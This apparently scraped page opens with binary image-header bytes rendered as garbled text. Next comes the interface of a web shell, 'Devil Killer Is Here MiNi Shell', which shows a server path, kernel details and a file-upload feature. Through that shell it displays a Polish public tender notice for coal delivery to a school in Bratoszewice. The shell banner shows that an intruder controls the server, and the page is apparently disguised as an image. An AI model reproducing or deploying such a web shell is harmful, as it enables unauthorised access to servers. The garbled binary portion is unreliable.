JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221121/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221121/0044811601-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> DOSTAWA OPAŁU DLA ZESPOŁU SZKÓŁ NR 1 W BRATOSZEWICACH NA 2023 ROK </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Zespół Szkół Nr 1 im. Batalionów Chłopskich</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000098192</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Staszica 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bratoszewice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">95-011</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL712 - Łódzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@zs1bratoszewice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zs1bratoszewice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> DOSTAWA OPAŁU DLA ZESPOŁU SZKÓŁ NR 1 W BRATOSZEWICACH NA 2023 ROK </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-52919c2c-66a3-11ed-abdb-a69c1593877c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00448116</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-11-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00447888/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa opału dla Zespołu Szkół Nr 1 w Bratoszewicach na 2023 rok.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja między Zamawiającym<br/>a Wykonawcami odbywa się przy użyciu miniPortalu, który jest dostępny pod adresem: https://miniportal.uzp.gov.pl/ , ePUAPu, dostępnego pod adresem https://epuap.gov.pl/wps/portal oraz poczty elektronicznej e-mail sekretariat@zs1bratoszewice.pl<br/>2. Komunikacja między Zamawiającym a Wykonawcą odbywa się zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (t.j.<br/>Dz.U. z 2020r., poz. 2452).<br/>3. Wykonawca, aby wziąć udział w postępowaniu musi posiadać konto na ePUAP.<br/>4. Wykonawca posiadający konto na ePUAP ma dostęp do następujących formularzy: „Formularz do złożenia, zmiany, wycofania<br/>oferty lub wniosku” oraz do „Formularza do komunikacji”.<br/>5. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z systemu miniPortal oraz<br/>Warunkach korzystania z elektronicznej platformy usług administracji publicznej (ePUAP).<br/>6. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz złożenia, zmiany, wycofania<br/>oferty lub wniosku” i „Formularza do komunikacji” wynosi 150 MB.<br/>7. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii<br/>dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich przekazania na ePUAP.<br/>8. Niniejsze postępowanie można wyszukać na stronie internetowej prowadzonego postępowania: https://miniportal.uzp.gov.pl/ na<br/>Liście wszystkich postępowań w miniPortalu klikając wcześniej opcję „Dla Wykonawców” lub ze strony głównej z zakładki<br/>Postępowania. Identyfikator postępowania stanowi Załącznik nr 2 do SWZ. Postępowania zamieszczone jest również na stronie<br/>internetowej www.zs1bratoszewice.pl, w BIP w zakładce Zamówienia Publiczne.<br/>9. Ofertę, oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp (oraz inne dokumenty wymienione w §11 ust. 1 SWZ), składa<br/>się, pod rygorem nieważności, w formie elektronicznej (podpisane kwalifikowanym podpisem elektronicznym) lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Ofertę wraz z plikami załączonymi do niej (składanymi na<br/>pierwszym etapie postępowania) należy przed złożeniem zaszyfrować (składanie ofert odbywa się w całości przy użyciu środków<br/>komunikacji elektronicznej, a więc bez możliwości odstąpienia od wymagania użycia środków komunikacji elektronicznej, w sposób<br/>określony w art. 63 ust. 2 Pzp, tj. w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym).<br/>10. Wymagania techniczne i organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej opisane zostały w<br/>Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP.<br/>5. Identyfikator postępowania o udzielenie zamówienia dostępny jest na Liście wszystkich postępowań na miniPortalu oraz został<br/>wskazany w niniejszej SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i ust. 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (określane jako „RODO”) informuję, iż:<br/>1. Administratorem Pani/Pana danych osobowych jest Zespół Szkół Nr 1 im. Batalionów Chłopskich<br/>z siedzibą w Bratoszewicach, plac Staszica 14, 95-011 Bratoszewice<br/>e-mail: sekretariat@zs1bratoszewice.pl<br/>2. Informacje kontaktowe Inspektora ochrony danych w Zespole Szkół Nr 1 w Bratoszewicach, e-mail: iod@lesny.com.pl<br/>3. Pana/Pani dane osobowe będą przetwarzane w celach związanych z zawarciem<br/>i realizacją umowy cywilno-prawnej w oparciu o art. 6 ust.1 lit. b) RODO, a także w celu związanym<br/>z dochodzeniem ewentualnych roszczeń, odszkodowań w oparciu o art. 6 ust. 1 lit. f) RODO<br/>4. Odbiorcami danych są podmioty określone w przepisach prawa lub inne podmioty na podstawie stosownych umów zawartych z<br/>Zespołem Szkół Nr 1 w Bratoszewicach.<br/>5. Dane osobowe nie będą przekazywane do państwa trzeciego/organizacji międzynarodowe<br/>6. Przysługuje Panu/Pani prawo dostępu do swoich danych osobowych, ich sprostowania, usunięcia lub ograniczenia przetwarzania<br/>a także prawo sprzeciwu, zażądania zaprzestania przetwarzania i prawo przenoszenia danych – w przypadkach i na zasadach<br/>określonych<br/>w przepisach RODO.<br/>7. Pana / Pani dane osobowe będą przechowywane przez okres niezbędny do wykonania umowy, a po jej rozwiązaniu lub<br/>wygaśnięciu – przez obowiązkowy okres przechowywania dokumentacji, ustalony<br/>odrębnymi przepisami.<br/>8. Przysługuje Pani/Panu prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych z siedzibą w Warszawie przy<br/>ul. Stawki 2, 00-193 Warszawa.<br/>9. Podanie danych osobowych jest warunkiem niezbędnym do zawarcia umowy cywilno-prawnej.<br/>W przypadku nie podania danych osobowych nie będzie możliwe jej zawarcie.<br/>10. Pani/Pana osobowe nie będą podlegać zautomatyzowanemu podejmowaniu decyzji lub profilowaniu.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZSNR1.GOS.226.1.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest dostawa opału – ekomiału/miału w ilości szacunkowej 200 ton, polegająca na<br/>sukcesywnych dostawach (dokładne ilości określa każdorazowo Zamawiający), do składu zlokalizowanego w siedzibie<br/>Zamawiającego.<br/>2. Wszelkie koszty związane z dostarczeniem opału, rozładunkiem do magazynu zamawiającego ponosi Wykonawca.<br/>Magazyn opału Zamawiającego pozwala na rozładunek samochodu do 7 ton. Wymiary drzwi : szerokość 2,77m wysokość<br/>2,57 m. Wykonawca zobowiązuje się do rozładunku opału do magazynu opału Zamawiającego na swój koszt. Dostawy<br/>opału muszą spełniać wszystkie wymagane normy jakościowe i posiadać wymagane atesty.<br/>3. Podane ilości opału mogą ulec zmianie o około 20% w zależności od bieżących potrzeb Zamawiającego. Zamawiający<br/>informuje, że w/w ilość jest podana tylko i wyłącznie w celu orientacyjnym a nie wiążącym strony. Zamawiający zastrzega<br/>sobie odbiór ilości opału zależnej od jego potrzeb-określanych na ok. 1 tydzień.<br/>4. Oferowany opał – ekomiał/miał musi spełniać parametry jakościowe określone w Rozporządzeniu Ministra Energii z dnia<br/>27 września 2018r. w sprawie wymagań jakościowych dla paliw stałych tabela 5. -wartość opałowa minimum 24 MJ/kg -<br/>granulacja węgla 3-31,5 mm; zawartość podziarna do 15%; -zawartość nadziarna do 5% -zawartość popiołu do 12 %, -<br/>zawartość siarki do 1,2 %; -wilgotność: do 20 % -niska spiekalność. Wyżej wymienione parametry wynikają także z<br/>warunków eksploatacyjnych posiadanych przez zamawiającego kotłów KWM-SP i VAKO-S, które posiadają paleniska<br/>retortowe a ich producent zastrzegł sobie stosowanie opału nie powodującego spieków. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09111000-0 - Węgiel i paliwa na bazie węgla</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-02 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca w terminie wyznaczonym na składanie ofert składa następujące dokumenty:<br/>a) Ofertę podpisaną i zgodną z formularzem ofertowym – załącznik nr 1 do SWZ.<br/>b) Oświadczenie wykonawcy składane na podstawie art. 125 ust. 1 ustawy Pzp o niepodleganiu wykluczeniu – załącznik nr<br/>3 do SWZ, tzn. oświadczenie, które stanowi dowód potwierdzający brak podstaw wykluczenia, odpowiednio na dzień<br/>składania ofert, tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe. Dołączone<br/>oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp nie jest podmiotowym środkiem dowodowym i stanowi<br/>tymczasowy dowód potwierdzający brak podstaw wykluczenia na dzień składania ofert.<br/>Oświadczenie składa Wykonawca a w przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie<br/>składa każdy z wykonawców.<br/>Wykonawca, który polega na sytuacji podmiotów udostępniających zasoby, przedstawia także oświadczenie podmiotu<br/>udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu.<br/>c) Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy lub podmiotu<br/>udostępniającego zasoby chyba, że umocowanie do reprezentacji wynika z nw. dokumentów: odpis lub informacja z<br/>Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej.<br/>d) Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wszystkich Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia (np. umowa o współdziałaniu). Pełnomocnik może być ustanowiony do<br/>reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy;<br/>e) Pisemne zobowiązanie podmiotu/ów udostępniającego zasoby do oddania do dyspozycji Wykonawcy niezbędnych<br/>zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca<br/>realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów - jeśli dotyczy.<br/>Zobowiązanie podmiotu udostępniającego zasoby musi potwierdzać, że stosunek łączący wykonawcę z podmiotami<br/>udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>- zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>- sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>f) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, zgodne z art. 117 ust 4<br/>ustawy Pzp, z którego wynika, które usługi wykonują poszczególni Wykonawcy, według załącznika nr 5 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy stosownie do treści art. 58 ustawy Pzp mogą wspólnie ubiegać się o udzielenie niniejszego zamówienia. W<br/>takim przypadku wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia<br/>albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być<br/>załączone do oferty. Pełnomocnictwo musi jednoznacznie wynikać z umowy lub z innej czynności prawnej, mieć formę<br/>pisemną, musi w swej treści zawierać wskazanie niniejszego postępowania. Pełnomocnictwo musi być załączone w<br/>oryginale w postacie elektronicznej i podpisane przez uprawnionych, w świetle dokumentów rejestracyjnych, przedstawicieli<br/>wykonawców albo w formie notarialnie potwierdzonej kopii. Wszelka korespondencja prowadzona będzie z pełnomocnikiem.<br/>2. Postanowienia dotyczące wykonawcy stosuje się odpowiednio do wykonawców, o których mowa w ust. 1.<br/>3. W przypadku, gdy Wykonawca składa więcej niż jedną ofertę samodzielnie lub wspólnie z innymi wykonawcami, oferty<br/>takiego Wykonawcy zostaną odrzucone.<br/>4. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w art.<br/>125 ust. 1 ustawy Pzp, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>5. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w<br/>art. 112 ust. 2 pkt 2 jest spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do<br/>których realizacji te uprawnienia są wymagane.<br/>6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, zgodne z art. 117 ust 4<br/>ustawy Pzp, z którego wynika, które roboty budowlane, dostawy lub usługi wykonują poszczególni Wykonawcy, według<br/>załącznika nr 5 do SWZ.<br/>7. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców<br/>wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza zmianę postanowień zawartej umowy w następujących przypadkach:<br/>a) zmiany stawki podatku od towarów i usług, lub innych opłat wynikających z obowiązujących przepisów prawa,<br/>b) w innych uzasadnionych przypadkach, gdy zajdzie konieczność wprowadzenia zmian wynikających z okoliczności,<br/>których nie można było przewidzieć w chwili zawarcia umowy,<br/>c) w przypadku, gdy zmiany postanowień zawartej umowy będą korzystne dla Zamawiającego, a zmiany wynikły w trakcie<br/>realizacji zamówienia,<br/>d) zaistnienia uwarunkowań społecznych (protesty, listy, petycje, itp.),<br/>e) zmiany stanu prawnego, w szczególności zmiany przepisów z zakresu transportu drogowego rzeczy (ustawa o<br/>transporcie drogowym i przepisy wykonawcze) itp.,<br/>f) zmiana danych Wykonawcy, Zamawiającego np. zmiana adresu, konta bankowego, nr REGON, osób kontaktowych,<br/>zmiany formy prawnej prowadzenia działalności gospodarczej,<br/>g) działania siły wyższej uniemożliwiającej realizację w części lub w całości umowy, działania sił natury, zdarzeń losowych,<br/>h) zmiany w sposobie dokonywania płatności, rozliczeń.<br/>i) w przypadku zaistnienia okoliczności, o których mowa w art. 455 ustawy Prawo Zamówień Publicznych.<br/>2. W przypadku zmiany stawki podatku od towarów i usług, dopuszcza się zmianę wynagrodzenia jeżeli zmiany te będą<br/>miały wpływ na koszty wykonania zamówienia przez Wykonawcę i zostaną one udokumentowane przez Wykonawcę<br/>poprzez przedstawienie szczegółowej kalkulacji kosztów wskazujących jaki wpływ miał ten wzrost przedmiotowych wartości<br/>na koszty wykonania tego zamówienia, a Zamawiający zaakceptuje powyższą kalkulację.<br/>3. Zamawiający dopuszcza możliwość waloryzacji cen w drodze porozumienia stron. Podstawą waloryzacji są wskaźniki cen<br/>towarów i usług konsumpcyjnych (inflacja) w stosunku do poprzedniego okresu ogłaszane w tabelach Głównego 